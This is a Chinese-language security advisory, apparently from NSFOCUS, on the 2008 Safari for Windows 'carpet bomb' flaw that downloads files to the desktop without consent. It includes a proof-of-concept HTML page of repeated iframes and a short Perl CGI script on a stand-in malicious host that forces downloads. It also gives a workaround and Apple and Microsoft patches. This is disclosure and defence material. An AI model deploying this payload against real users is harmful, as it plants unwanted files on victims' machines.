安全研究

安全漏洞
Apple Safari for Windows任意文件下载执行漏洞(MS09-014/MS09-015)

发布日期:2008-05-30
更新日期:2009-04-20

受影响系统:
Apple Safari 3.1.1
    - Microsoft Windows XP SP3
    - Microsoft Windows XP SP2
    - Microsoft Windows Vista
不受影响系统:
Apple Safari 3.1.2
描述:
BUGTRAQ  ID: 29445
CVE(CAN) ID: CVE-2008-2540

Safari是苹果家族操作系统所捆绑的WEB浏览器。

Safari浏览器无法配置为在下载资源之前获得用户的许可,未经用户同意便将资源下载到了默认的位置。

假设用户访问了提供以下HTML的恶意站点http://malicious.example.com/

<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>

其中http://malicious.example.com/cgi-bin/carpet_bomb.cgi 为:

#!/usr/bin/perl
print "Content-type: blah/blah\n\n"

由于Safari不知道如何渲染blah/blah内容类型,就会自动开始下载carpet_bomb.cgi。如果在Windows平台上使用Safari的话,访问http://malicious.example.com/ 后就会未经用户同意向用户桌面下载恶意软件。

<*来源:Nitesh Dhanjani
  
  链接:http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html
        http://www.microsoft.com/technet/security/advisory/953818.mspx?pf=true
        http://blogs.zdnet.com/security/?p=1230
        http://secunia.com/advisories/30467/
        http://secunia.com/advisories/30775/
        http://support.apple.com/kb/HT2092
        http://www.microsoft.com/technet/security/bulletin/MS09-014.mspx?pf=true
        http://www.microsoft.com/technet/security/bulletin/MS09-015.mspx?pf=true
*>

建议:
临时解决方法:

* 将Safari的文件下载位置更改为非桌面。

厂商补丁:

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.apple.com/safari/download/

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS09-014)以及相应补丁:
MS09-014:Cumulative Security Update for Internet Explorer (963027)
链接:http://www.microsoft.com/technet/security/bulletin/MS09-014.mspx?pf=true

浏览次数:3063
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客